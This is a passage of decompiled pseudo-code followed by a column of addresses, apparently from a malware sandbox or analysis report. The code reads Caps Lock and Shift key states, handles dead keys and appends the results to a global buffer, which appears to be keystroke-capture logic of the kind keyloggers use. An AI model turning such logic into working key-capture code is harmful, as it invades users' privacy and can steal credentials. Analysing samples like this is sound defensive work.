													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x240520b4;
														__eax = E24013344(__edi, 0x240520b4);
													} else {
														__eax = __edi;
														__edx = 0x240520c0;
														__eax = E24013344(__edi, 0x240520c0);
													}
												} else {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x240520c0;
														__eax = E24013344(__edi, 0x240520c0);
													} else {
														__eax = __edi;
														__edx = 0x240520b4;
														__eax = E24013344(__edi, 0x240520b4);
													}
												}
											}
										} else {
											__eax =  *__edi;
											__edx = E2401333C( *__edi);
											__eax = __edi;
											__ecx = 1;
											__eax = E240135D0(__edi, 1, __edx);
											_push(0x14);
											L240152F0();
											__eflags = __ax - 1;
											if(__ax != 1) {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x2405209c;
													__eax = E24013344(__edi, 0x2405209c);
												} else {
													__eax = __edi;
													__edx = 0x240520a8;
													__eax = E24013344(__edi, 0x240520a8);
												}
											} else {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x240520a8;
													__eax = E24013344(__edi, 0x240520a8);
												} else {
													__eax = __edi;
													__edx = 0x2405209c;
													__eax = E24013344(__edi, 0x2405209c);
												}
											}
										}
									}
									goto L285;
								case 0x1f:
									__eax =  *__edi;
									__eax = E2401333C( *__edi);
									__eflags = __eax;
									if(__eax <= 0) {
										_push(0x14);
										L240152F0();
										__eflags = __ax - 1;
										if(__ax != 1) {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v260;
												0 = E24050318(0,  &_v260);
												__eax = _v260;
												__edx =  &_v256;
												__eax = E240159CC(_v260, __ebx,  &_v256, __edi, __esi, __eflags);
												__edx = _v256;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v252;
												0 = E24050318(0,  &_v252);
												__eax = _v252;
												__edx =  &_v248;
												__eax = E24015948(_v252, __ebx,  &_v248, __edi, __esi, __eflags);
												__edx = _v248;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										} else {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v244;
												0 = E24050318(0,  &_v244);
												__eax = _v244;
												__edx =  &_v240;
												__eax = E24015948(_v244, __ebx,  &_v240, __edi, __esi, __eflags);
												__edx = _v240;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v236;
												0 = E24050318(0,  &_v236);
												__eax = _v236;
												__edx =  &_v232;
												__eax = E240159CC(_v236, __ebx,  &_v232, __edi, __esi, __eflags);
												__edx = _v232;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										}
									} else {
										__eax =  *__edi;
										__eax = E2401333C( *__edi);
										__edx =  *__edi;
										__eflags = __edx[__eax - 1] - 0xb4;
										if(__edx[__eax - 1] != 0xb4) {
											__eax =  *__edi;
											__eax = E2401333C( *__edi);
											__edx =  *__edi;
											__eflags = __edx[__eax - 1] - 0x60;
											if(__edx[__eax - 1] != 0x60) {
												__eax =  *__edi;
												__eax = E2401333C( *__edi);
												__edx =  *__edi;
												__eflags = __edx[__eax - 1] - 0x7e;
												if(__edx[__eax - 1] != 0x7e) {
													__eax =  *__edi;
													__eax = E2401333C( *__edi);
													__edx =  *__edi;
													__eflags = __edx[__eax - 1] - 0x5e;
													if(__edx[__eax - 1] != 0x5e) {
														_push(0x14);
														L240152F0();
														__eflags = __ax - 1;
														if(__ax != 1) {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__edx =  &_v228;
																0 = E24050318(0,  &_v228);
																__eax = _v228;
																__edx =  &_v224;
																__eax = E240159CC(_v228, __ebx,  &_v224, __edi, __esi, __eflags);
																__edx = _v224;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															} else {
																__edx =  &_v220;
																0 = E24050318(0,  &_v220);
																__eax = _v220;
																__edx =  &_v216;
																__eax = E24015948(_v220, __ebx,  &_v216, __edi, __esi, __eflags);
																__edx = _v216;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															}
														} else {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__edx =  &_v212;
																0 = E24050318(0,  &_v212);
																__eax = _v212;
																__edx =  &_v208;
																__eax = E24015948(_v212, __ebx,  &_v208, __edi, __esi, __eflags);
																__edx = _v208;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															} else {
																__edx =  &_v204;
																0 = E24050318(0,  &_v204);
																__eax = _v204;
																__edx =  &_v200;
																__eax = E240159CC(_v204, __ebx,  &_v200, __edi, __esi, __eflags);
																__edx = _v200;
																__eax = __edi;
																__eax = E24013344(__edi, __edx);
															}
														}
													} else {
														__eax =  *__edi;
														__edx = E2401333C( *__edi);
														__eax = __edi;
														__ecx = 1;
														__eax = E240135D0(__edi, 1, __edx);
														_push(0x14);
														L240152F0();
														__eflags = __ax - 1;
														if(__ax != 1) {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__eax = __edi;
																__edx = 0x2405212c;
																__eax = E24013344(__edi, 0x2405212c);
															} else {
																__eax = __edi;
																__edx = 0x24052138;
																__eax = E24013344(__edi, 0x24052138);
															}
														} else {
															_push(0x10);
															L240152F0();
															__eflags = __ax;
															if(__ax >= 0) {
																__eax = __edi;
																__edx = 0x24052138;
																__eax = E24013344(__edi, 0x24052138);
															} else {
																__eax = __edi;
																__edx = 0x2405212c;
																__eax = E24013344(__edi, 0x2405212c);
															}
														}
													}
												} else {
													__eax =  *__edi;
													__edx = E2401333C( *__edi);
													__eax = __edi;
													__ecx = 1;
													__eax = E240135D0(__edi, 1, __edx);
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052114;
															__eax = E24013344(__edi, 0x24052114);
														} else {
															__eax = __edi;
															__edx = 0x24052120;
															__eax = E24013344(__edi, 0x24052120);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052120;
															__eax = E24013344(__edi, 0x24052120);
														} else {
															__eax = __edi;
															__edx = 0x24052114;
															__eax = E24013344(__edi, 0x24052114);
														}
													}
												}
											} else {
												__eax =  *__edi;
												__edx = E2401333C( *__edi);
												__eax = __edi;
												__ecx = 1;
												__eax = E240135D0(__edi, 1, __edx);
												_push(0x14);
												L240152F0();
												__eflags = __ax - 1;
												if(__ax != 1) {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x240520fc;
														__eax = E24013344(__edi, 0x240520fc);
													} else {
														__eax = __edi;
														__edx = 0x24052108;
														__eax = E24013344(__edi, 0x24052108);
													}
												} else {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x24052108;
														__eax = E24013344(__edi, 0x24052108);
													} else {
														__eax = __edi;
														__edx = 0x240520fc;
														__eax = E24013344(__edi, 0x240520fc);
													}
												}
											}
										} else {
											__eax =  *__edi;
											__edx = E2401333C( *__edi);
											__eax = __edi;
											__ecx = 1;
											__eax = E240135D0(__edi, 1, __edx);
											_push(0x14);
											L240152F0();
											__eflags = __ax - 1;
											if(__ax != 1) {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x240520e4;
													__eax = E24013344(__edi, 0x240520e4);
												} else {
													__eax = __edi;
													__edx = 0x240520f0;
													__eax = E24013344(__edi, 0x240520f0);
												}
											} else {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x240520f0;
													__eax = E24013344(__edi, 0x240520f0);
												} else {
													__eax = __edi;
													__edx = 0x240520e4;
													__eax = E24013344(__edi, 0x240520e4);
												}
											}
										}
									}
									goto L285;
								case 0x20:
									__eax =  *__edi;
									__eax = E2401333C( *__edi);
									__eflags = __eax;
									if(__eax <= 0) {
										_push(0x14);
										L240152F0();
										__eflags = __ax - 1;
										if(__ax != 1) {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v324;
												0 = E24050318(0,  &_v324);
												__eax = _v324;
												__edx =  &_v320;
												__eax = E240159CC(_v324, __ebx,  &_v320, __edi, __esi, __eflags);
												__edx = _v320;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v316;
												0 = E24050318(0,  &_v316);
												__eax = _v316;
												__edx =  &_v312;
												__eax = E24015948(_v316, __ebx,  &_v312, __edi, __esi, __eflags);
												__edx = _v312;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										} else {
											_push(0x10);
											L240152F0();
											__eflags = __ax;
											if(__ax >= 0) {
												__edx =  &_v308;
												0 = E24050318(0,  &_v308);
												__eax = _v308;
												__edx =  &_v304;
												__eax = E24015948(_v308, __ebx,  &_v304, __edi, __esi, __eflags);
												__edx = _v304;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											} else {
												__edx =  &_v300;
												0 = E24050318(0,  &_v300);
												__eax = _v300;
												__edx =  &_v296;
												__eax = E240159CC(_v300, __ebx,  &_v296, __edi, __esi, __eflags);
												__edx = _v296;
												__eax = __edi;
												__eax = E24013344(__edi, __edx);
											}
										}
									} else {
										__eax =  *__edi;
										__eax = E2401333C( *__edi);
										__edx =  *__edi;
										__eflags = __edx[__eax - 1] - 0xb4;
										if(__edx[__eax - 1] != 0xb4) {
											__eax =  *__edi;
											__eax = E2401333C( *__edi);
											__edx =  *__edi;
											__eflags = __edx[__eax - 1] - 0x60;
											if(__edx[__eax - 1] != 0x60) {
												__eax =  *__edi;
												__eax = E2401333C( *__edi);
												__edx =  *__edi;
												__eflags = __edx[__eax - 1] - 0x5e;
												if(__edx[__eax - 1] != 0x5e) {
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__edx =  &_v292;
															0 = E24050318(0,  &_v292);
															__eax = _v292;
															__edx =  &_v288;
															__eax = E240159CC(_v292, __ebx,  &_v288, __edi, __esi, __eflags);
															__edx = _v288;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														} else {
															__edx =  &_v284;
															0 = E24050318(0,  &_v284);
															__eax = _v284;
															__edx =  &_v280;
															__eax = E24015948(_v284, __ebx,  &_v280, __edi, __esi, __eflags);
															__edx = _v280;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__edx =  &_v276;
															0 = E24050318(0,  &_v276);
															__eax = _v276;
															__edx =  &_v272;
															__eax = E24015948(_v276, __ebx,  &_v272, __edi, __esi, __eflags);
															__edx = _v272;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														} else {
															__edx =  &_v268;
															0 = E24050318(0,  &_v268);
															__eax = _v268;
															__edx =  &_v264;
															__eax = E240159CC(_v268, __ebx,  &_v264, __edi, __esi, __eflags);
															__edx = _v264;
															__eax = __edi;
															__eax = E24013344(__edi, __edx);
														}
													}
												} else {
													__eax =  *__edi;
													__edx = E2401333C( *__edi);
													__eax = __edi;
													__ecx = 1;
													__eax = E240135D0(__edi, 1, __edx);
													_push(0x14);
													L240152F0();
													__eflags = __ax - 1;
													if(__ax != 1) {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052174;
															__eax = E24013344(__edi, 0x24052174);
														} else {
															__eax = __edi;
															__edx = 0x24052180;
															__eax = E24013344(__edi, 0x24052180);
														}
													} else {
														_push(0x10);
														L240152F0();
														__eflags = __ax;
														if(__ax >= 0) {
															__eax = __edi;
															__edx = 0x24052180;
															__eax = E24013344(__edi, 0x24052180);
														} else {
															__eax = __edi;
															__edx = 0x24052174;
															__eax = E24013344(__edi, 0x24052174);
														}
													}
												}
											} else {
												__eax =  *__edi;
												__edx = E2401333C( *__edi);
												__eax = __edi;
												__ecx = 1;
												__eax = E240135D0(__edi, 1, __edx);
												_push(0x14);
												L240152F0();
												__eflags = __ax - 1;
												if(__ax != 1) {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x2405215c;
														__eax = E24013344(__edi, 0x2405215c);
													} else {
														__eax = __edi;
														__edx = 0x24052168;
														__eax = E24013344(__edi, 0x24052168);
													}
												} else {
													_push(0x10);
													L240152F0();
													__eflags = __ax;
													if(__ax >= 0) {
														__eax = __edi;
														__edx = 0x24052168;
														__eax = E24013344(__edi, 0x24052168);
													} else {
														__eax = __edi;
														__edx = 0x2405215c;
														__eax = E24013344(__edi, 0x2405215c);
													}
												}
											}
										} else {
											__eax =  *__edi;
											__edx = E2401333C( *__edi);
											__eax = __edi;
											__ecx = 1;
											__eax = E240135D0(__edi, 1, __edx);
											_push(0x14);
											L240152F0();
											__eflags = __ax - 1;
											if(__ax != 1) {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x24052144;
													__eax = E24013344(__edi, 0x24052144);
												} else {
													__eax = __edi;
													__edx = 0x24052150;
													__eax = E24013344(__edi, 0x24052150);
												}
											} else {
												_push(0x10);
												L240152F0();
												__eflags = __ax;
												if(__ax >= 0) {
													__eax = __edi;
													__edx = 0x24052150;
													__eax = E24013344(__edi, 0x24052150);
												} else {
													__eax = __edi;
													__edx = 0x24052144;
													__eax = E24013344(__edi, 0x24052144);
												}
											}
										}
									}
									goto L285;
							}
						} else {
							_t342 = GetKeyState(0x14);
							__eflags = _t342 - 1;
							if(_t342 != 1) {
								_t343 = GetKeyState(0x10);
								__eflags = _t343;
								if(_t343 >= 0) {
									_t345 = E2401333C( *0x240632f8);
									__eflags = _t345;
									if(_t345 > 0) {
										_t347 = E2401333C( *0x240632f8);
										_t444 =  *0x240632f8;
										__eflags =  *((char*)(_t444 + _t347 - 1)) - 0xb4;
										if( *((char*)(_t444 + _t347 - 1)) != 0xb4) {
											E24013344(0x240632f8, 0x24051de4);
										}
									}
								} else {
									_t351 = E2401333C( *0x240632f8);
									__eflags = _t351;
									if(_t351 > 0) {
										_t353 = E2401333C( *0x240632f8);
										_t446 =  *0x240632f8;
										__eflags =  *((char*)(_t446 + _t353 - 1)) - 0x60;
										if( *((char*)(_t446 + _t353 - 1)) != 0x60) {
											E24013344(0x240632f8, 0x24051df0);
										}
									}
								}
							} else {
								_t356 = GetKeyState(0x10);
								__eflags = _t356;
								if(_t356 >= 0) {
									_t358 = E2401333C( *0x240632f8);
									__eflags = _t358;
									if(_t358 > 0) {
										_t360 = E2401333C( *0x240632f8);
										_t448 =  *0x240632f8;
										__eflags =  *((char*)(_t448 + _t360 - 1)) - 0x60;
										if( *((char*)(_t448 + _t360 - 1)) != 0x60) {
											E24013344(0x240632f8, 0x24051df0);
										}
									}
								} else {
									_t364 = E2401333C( *0x240632f8);
									__eflags = _t364;
									if(_t364 > 0) {
										_t366 = E2401333C( *0x240632f8);
										_t450 =  *0x240632f8;
										__eflags =  *((char*)(_t450 + _t366 - 1)) - 0xb4;
										if( *((char*)(_t450 + _t366 - 1)) != 0xb4) {
											E24013344(0x240632f8, 0x24051de4);
										}
									}
								}
							}
							goto L285;
						}
					} else {
						if(GetKeyState(0x14) != 1) {
							_t370 = GetKeyState(0x10);
							__eflags = _t370;
							if(_t370 >= 0) {
								_t372 = E2401333C( *0x240632f8);
								__eflags = _t372;
								if(_t372 > 0) {
									_t374 = E2401333C( *0x240632f8);
									_t452 =  *0x240632f8;
									__eflags =  *((char*)(_t452 + _t374 - 1)) - 0x7e;
									if( *((char*)(_t452 + _t374 - 1)) != 0x7e) {
										E24013344(0x240632f8, 0x24051dc0);
									}
								}
							} else {
								_t378 = E2401333C( *0x240632f8);
								__eflags = _t378;
								if(_t378 > 0) {
									_t380 = E2401333C( *0x240632f8);
									_t454 =  *0x240632f8;
									__eflags =  *((char*)(_t454 + _t380 - 1)) - 0x5e;
									if( *((char*)(_t454 + _t380 - 1)) != 0x5e) {
										E24013344(0x240632f8, 0x24051dcc);
									}
								}
							}
						} else {
							if(GetKeyState(0x10) >= 0) {
								_t385 = E2401333C( *0x240632f8);
								__eflags = _t385;
								if(_t385 > 0) {
									_t387 = E2401333C( *0x240632f8);
									_t456 =  *0x240632f8;
									__eflags =  *((char*)(_t456 + _t387 - 1)) - 0x5e;
									if( *((char*)(_t456 + _t387 - 1)) != 0x5e) {
										E24013344(0x240632f8, 0x24051dcc);
									}
								}
							} else {
								if(E2401333C( *0x240632f8) > 0 &&  *((char*)( *0x240632f8 + E2401333C( *0x240632f8) - 1)) != 0x7e) {
									E24013344(0x240632f8, 0x24051dc0);
								}
							}
						}
					}
					L285:
					_t397 = _t397 + 1;
					_t463 = _t463 + 4;
					if(_t397 == 0) {
						_t247 = E2401333C( *0x240632f8);
						E24013590( *0x240632f8, 2, _t247 != 1,  &_v360);
						E24013480(_v360, 0x24051dd8);
						if(_t247 != 1) {
							__eflags = E2401333C( *0x240632f8) - 1;
							E24013590( *0x240632f8, 2, E2401333C( *0x240632f8) - 1,  &_v364);
							E24013480(_v364, 0x2405218c);
							if(__eflags != 0) {
								__eflags = E2401333C( *0x240632f8) - 1;
								E24013590( *0x240632f8, 2, E2401333C( *0x240632f8) - 1,  &_v368);
								E24013480(_v368, 0x24051db4);
								if(__eflags != 0) {
									__eflags = E2401333C( *0x240632f8) - 1;
									E24013590( *0x240632f8, 2, E2401333C( *0x240632f8) - 1,  &_v372);
									E24013480(_v372, 0x24052198);
									if(__eflags == 0) {
										E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
									}
								} else {
									E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
								}
							} else {
								E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
							}
						} else {
							E240135D0(0x240632f8, 1, E2401333C( *0x240632f8));
						}
						if(E2401333C( *0x240632f8) >  *0x24063300) {
							 *0x24063308 = 1;
						}
						_pop(_t427);
						 *[fs:eax] = _t427;
						_push(E24051DA2);
						return E240130AC( &_v372, 0x5c);
					}
				}
				L1:
				_push(0);
				_push(0);
				_t398 = _t398 - 1;
				if(_t398 != 0) {
					goto L1;
				} else {
					_push(_t465);
					_push(0x24051d9b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t466;
					 *0x24063300 = E2401333C( *0x240632f8);
					_t397 = 8;
					_t463 = 0x24063310;
					goto L3;
				}
			}



































































































































                                    0x2405038d
                                    0x2405038f
                                    0x2405038f
                                    0x240503c4
                                    0x240503c4
                                    0x240503ce
                                    0x240503d2
                                    0x00000000
                                    0x00000000
                                    0x240503df
                                    0x240503e4
                                    0x240504e6
                                    0x240504eb
                                    0x240505ed
                                    0x240505f2
                                    0x24051b5d
                                    0x24051b5f
                                    0x24051b64
                                    0x24051b68
                                    0x24051bd9
                                    0x24051bde
                                    0x24051be1
                                    0x24051c18
                                    0x24051c1c
                                    0x24051c2d
                                    0x24051c3a
                                    0x24051be3
                                    0x24051bed
                                    0x24051bfe
                                    0x24051c0b
                                    0x24051c0b
                                    0x24051b6a
                                    0x24051b6c
                                    0x24051b71
                                    0x24051b74
                                    0x24051bb2
                                    0x24051bc3
                                    0x24051bd0
                                    0x24051b76
                                    0x24051b80
                                    0x24051b91
                                    0x24051b9e
                                    0x24051b9e
                                    0x24051b74
                                    0x00000000
                                    0x24051b68
                                    0x240505fe
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2405072c
                                    0x2405072f
                                    0x24050752
                                    0x2405075e
                                    0x24050731
                                    0x24050738
                                    0x24050738
                                    0x00000000
                                    0x00000000
                                    0x24050768
                                    0x2405076a
                                    0x2405076f
                                    0x00000000
                                    0x00000000
                                    0x24050779
                                    0x2405077b
                                    0x24050780
                                    0x00000000
                                    0x00000000
                                    0x2405078a
                                    0x2405078c
                                    0x24050791
                                    0x00000000
                                    0x00000000
                                    0x2405079b
                                    0x2405079d
                                    0x240507a2
                                    0x00000000
                                    0x00000000
                                    0x240507ac
                                    0x240507ae
                                    0x240507b3
                                    0x00000000
                                    0x00000000
                                    0x240507bd
                                    0x240507bf
                                    0x240507c4
                                    0x00000000
                                    0x00000000
                                    0x240507ce
                                    0x240507d0
                                    0x240507d5
                                    0x00000000
                                    0x00000000
                                    0x240507df
                                    0x240507e1
                                    0x240507e6
                                    0x00000000
                                    0x00000000
                                    0x240507f0
                                    0x240507f2
                                    0x240507f7
                                    0x00000000
                                    0x00000000
                                    0x24050801
                                    0x24050803
                                    0x24050808
                                    0x00000000
                                    0x00000000
                                    0x24050812
                                    0x24050814
                                    0x24050819
                                    0x00000000
                                    0x00000000
                                    0x24050823
                                    0x24050825
                                    0x2405082a
                                    0x00000000
                                    0x00000000
                                    0x24050834
                                    0x24050836
                                    0x2405083b
                                    0x00000000
                                    0x00000000
                                    0x24050845
                                    0x24050847
                                    0x2405084c
                                    0x00000000
                                    0x00000000
                                    0x24050856
                                    0x24050858
                                    0x2405085d
                                    0x00000000
                                    0x00000000
                                    0x24050867
                                    0x24050869
                                    0x2405086e
                                    0x00000000
                                    0x00000000
                                    0x24050878
                                    0x2405087a
                                    0x2405087f
                                    0x00000000
                                    0x00000000
                                    0x24050889
                                    0x2405088b
                                    0x24050890
                                    0x00000000
                                    0x00000000
                                    0x2405089a
                                    0x2405089c
                                    0x240508a1
                                    0x00000000
                                    0x00000000
                                    0x240508ab
                                    0x240508ad
                                    0x240508b2
                                    0x00000000
                                    0x00000000
                                    0x240508bc
                                    0x240508be
                                    0x240508c3
                                    0x00000000
                                    0x00000000
                                    0x240508cd
                                    0x240508cf
                                    0x240508d4
                                    0x00000000
                                    0x00000000
                                    0x240508de
                                    0x240508e0
                                    0x240508e5
                                    0x00000000
                                    0x00000000
                                    0x240508ef
                                    0x240508f1
                                    0x240508f6
                                    0x00000000
                                    0x00000000
                                    0x24050900
                                    0x24050902
                                    0x24050907
                                    0x00000000
                                    0x00000000
                                    0x24050911
                                    0x24050913
                                    0x24050918
                                    0x00000000
                                    0x00000000
                                    0x24050922
                                    0x24050924
                                    0x24050929
                                    0x2405092b
                                    0x24050c26
                                    0x24050c28
                                    0x24050c2d
                                    0x24050c31
                                    0x24050c8b
                                    0x24050c8d
                                    0x24050c92
                                    0x24050c95
                                    0x24050cbd
                                    0x24050cc4
                                    0x24050cc9
                                    0x24050ccc
                                    0x24050ccf
                                    0x24050cd4
                                    0x24050cd7
                                    0x24050cd9
                                    0x24050c97
                                    0x24050c97
                                    0x24050c9e
                                    0x24050ca3
                                    0x24050ca6
                                    0x24050ca9
                                    0x24050cae
                                    0x24050cb1
                                    0x24050cb3
                                    0x24050cb3
                                    0x24050c33
                                    0x24050c33
                                    0x24050c35
                                    0x24050c3a
                                    0x24050c3d
                                    0x24050c65
                                    0x24050c6c
                                    0x24050c71
                                    0x24050c74
                                    0x24050c77
                                    0x24050c7c
                                    0x24050c7f
                                    0x24050c81
                                    0x24050c3f
                                    0x24050c3f
                                    0x24050c46
                                    0x24050c4b
                                    0x24050c4e
                                    0x24050c51
                                    0x24050c56
                                    0x24050c59
                                    0x24050c5b
                                    0x24050c5b
                                    0x24050c3d
                                    0x24050931
                                    0x24050931
                                    0x24050933
                                    0x24050938
                                    0x2405093a
                                    0x2405093f
                                    0x240509bf
                                    0x240509c1
                                    0x240509c6
                                    0x240509c8
                                    0x240509cd
                                    0x24050a4d
                                    0x24050a4f
                                    0x24050a54
                                    0x24050a56
                                    0x24050a5b
                                    0x24050adb
                                    0x24050add
                                    0x24050ae2
                                    0x24050ae4
                                    0x24050ae9
                                    0x24050b69
                                    0x24050b6b
                                    0x24050b70
                                    0x24050b74
                                    0x24050bce
                                    0x24050bd0
                                    0x24050bd5
                                    0x24050bd8
                                    0x24050c00
                                    0x24050c07
                                    0x24050c0c
                                    0x24050c0f
                                    0x24050c12
                                    0x24050c17
                                    0x24050c1a
                                    0x24050c1c
                                    0x24050bda
                                    0x24050bda
                                    0x24050be1
                                    0x24050be6
                                    0x24050be9
                                    0x24050bec
                                    0x24050bf1
                                    0x24050bf4
                                    0x24050bf6
                                    0x24050bf6
                                    0x24050b76
                                    0x24050b76
                                    0x24050b78
                                    0x24050b7d
                                    0x24050b80
                                    0x24050ba8
                                    0x24050baf
                                    0x24050bb4
                                    0x24050bb7
                                    0x24050bba
                                    0x24050bbf
                                    0x24050bc2
                                    0x24050bc4
                                    0x24050b82
                                    0x24050b82
                                    0x24050b89
                                    0x24050b8e
                                    0x24050b91
                                    0x24050b94
                                    0x24050b99
                                    0x24050b9c
                                    0x24050b9e
                                    0x24050b9e
                                    0x24050b80
                                    0x24050aeb
                                    0x24050aeb
                                    0x24050af2
                                    0x24050af4
                                    0x24050af6
                                    0x24050afb
                                    0x24050b00
                                    0x24050b02
                                    0x24050b07
                                    0x24050b0b
                                    0x24050b3b
                                    0x24050b3d
                                    0x24050b42
                                    0x24050b45
                                    0x24050b58
                                    0x24050b5a
                                    0x24050b5f
                                    0x24050b47
                                    0x24050b47
                                    0x24050b49
                                    0x24050b4e
                                    0x24050b4e
                                    0x24050b0d
                                    0x24050b0d
                                    0x24050b0f
                                    0x24050b14
                                    0x24050b17
                                    0x24050b2a
                                    0x24050b2c
                                    0x24050b31
                                    0x24050b19
                                    0x24050b19
                                    0x24050b1b
                                    0x24050b20
                                    0x24050b20
                                    0x24050b17
                                    0x24050b0b
                                    0x24050a5d
                                    0x24050a5d
                                    0x24050a64
                                    0x24050a66
                                    0x24050a68
                                    0x24050a6d
                                    0x24050a72
                                    0x24050a74
                                    0x24050a79
                                    0x24050a7d
                                    0x24050aad
                                    0x24050aaf
                                    0x24050ab4
                                    0x24050ab7
                                    0x24050aca
                                    0x24050acc
                                    0x24050ad1
                                    0x24050ab9
                                    0x24050ab9
                                    0x24050abb
                                    0x24050ac0
                                    0x24050ac0
                                    0x24050a7f
                                    0x24050a7f
                                    0x24050a81
                                    0x24050a86
                                    0x24050a89
                                    0x24050a9c
                                    0x24050a9e
                                    0x24050aa3
                                    0x24050a8b
                                    0x24050a8b
                                    0x24050a8d
                                    0x24050a92
                                    0x24050a92
                                    0x24050a89
                                    0x24050a7d
                                    0x240509cf
                                    0x240509cf
                                    0x240509d6
                                    0x240509d8
                                    0x240509da
                                    0x240509df
                                    0x240509e4
                                    0x240509e6
                                    0x240509eb
                                    0x240509ef
                                    0x24050a1f
                                    0x24050a21
                                    0x24050a26
                                    0x24050a29
                                    0x24050a3c
                                    0x24050a3e
                                    0x24050a43
                                    0x24050a2b
                                    0x24050a2b
                                    0x24050a2d
                                    0x24050a32
                                    0x24050a32
                                    0x240509f1
                                    0x240509f1
                                    0x240509f3
                                    0x240509f8
                                    0x240509fb
                                    0x24050a0e
                                    0x24050a10
                                    0x24050a15
                                    0x240509fd
                                    0x240509fd
                                    0x240509ff
                                    0x24050a04
                                    0x24050a04
                                    0x240509fb
                                    0x240509ef
                                    0x24050941
                                    0x24050941
                                    0x24050948
                                    0x2405094a
                                    0x2405094c
                                    0x24050951
                                    0x24050956
                                    0x24050958
                                    0x2405095d
                                    0x24050961
                                    0x24050991
                                    0x24050993
                                    0x24050998
                                    0x2405099b
                                    0x240509ae
                                    0x240509b0
                                    0x240509b5
                                    0x2405099d
                                    0x2405099d
                                    0x2405099f
                                    0x240509a4
                                    0x240509a4
                                    0x24050963
                                    0x24050963
                                    0x24050965
                                    0x2405096a
                                    0x2405096d
                                    0x24050980
                                    0x24050982
                                    0x24050987
                                    0x2405096f
                                    0x2405096f
                                    0x24050971
                                    0x24050976
                                    0x24050976
                                    0x2405096d
                                    0x24050961
                                    0x2405093f
                                    0x00000000
                                    0x00000000
                                    0x24050ce3
                                    0x24050ce5
                                    0x24050cea
                                    0x24050cec
                                    0x24050f59
                                    0x24050f5b
                                    0x24050f60
                                    0x24050f64
                                    0x24050fbe
                                    0x24050fc0
                                    0x24050fc5
                                    0x24050fc8
                                    0x24050ff0
                                    0x24050ff7
                                    0x24050ffc
                                    0x24050fff
                                    0x24051002
                                    0x24051007
                                    0x2405100a
                                    0x2405100c
                                    0x24050fca
                                    0x24050fca
                                    0x24050fd1
                                    0x24050fd6
                                    0x24050fd9
                                    0x24050fdc
                                    0x24050fe1
                                    0x24050fe4
                                    0x24050fe6
                                    0x24050fe6
                                    0x24050f66
                                    0x24050f66
                                    0x24050f68
                                    0x24050f6d
                                    0x24050f70
                                    0x24050f98
                                    0x24050f9f
                                    0x24050fa4
                                    0x24050fa7
                                    0x24050faa
                                    0x24050faf
                                    0x24050fb2
                                    0x24050fb4
                                    0x24050f72
                                    0x24050f72
                                    0x24050f79
                                    0x24050f7e
                                    0x24050f81
                                    0x24050f84
                                    0x24050f89
                                    0x24050f8c
                                    0x24050f8e
                                    0x24050f8e
                                    0x24050f70
                                    0x24050cf2
                                    0x24050cf2
                                    0x24050cf4
                                    0x24050cf9
                                    0x24050cfb
                                    0x24050d00
                                    0x24050d80
                                    0x24050d82
                                    0x24050d87
                                    0x24050d89
                                    0x24050d8e
                                    0x24050e0e
                                    0x24050e10
                                    0x24050e15
                                    0x24050e17
                                    0x24050e1c
                                    0x24050e9c
                                    0x24050e9e
                                    0x24050ea3
                                    0x24050ea7
                                    0x24050f01
                                    0x24050f03
                                    0x24050f08
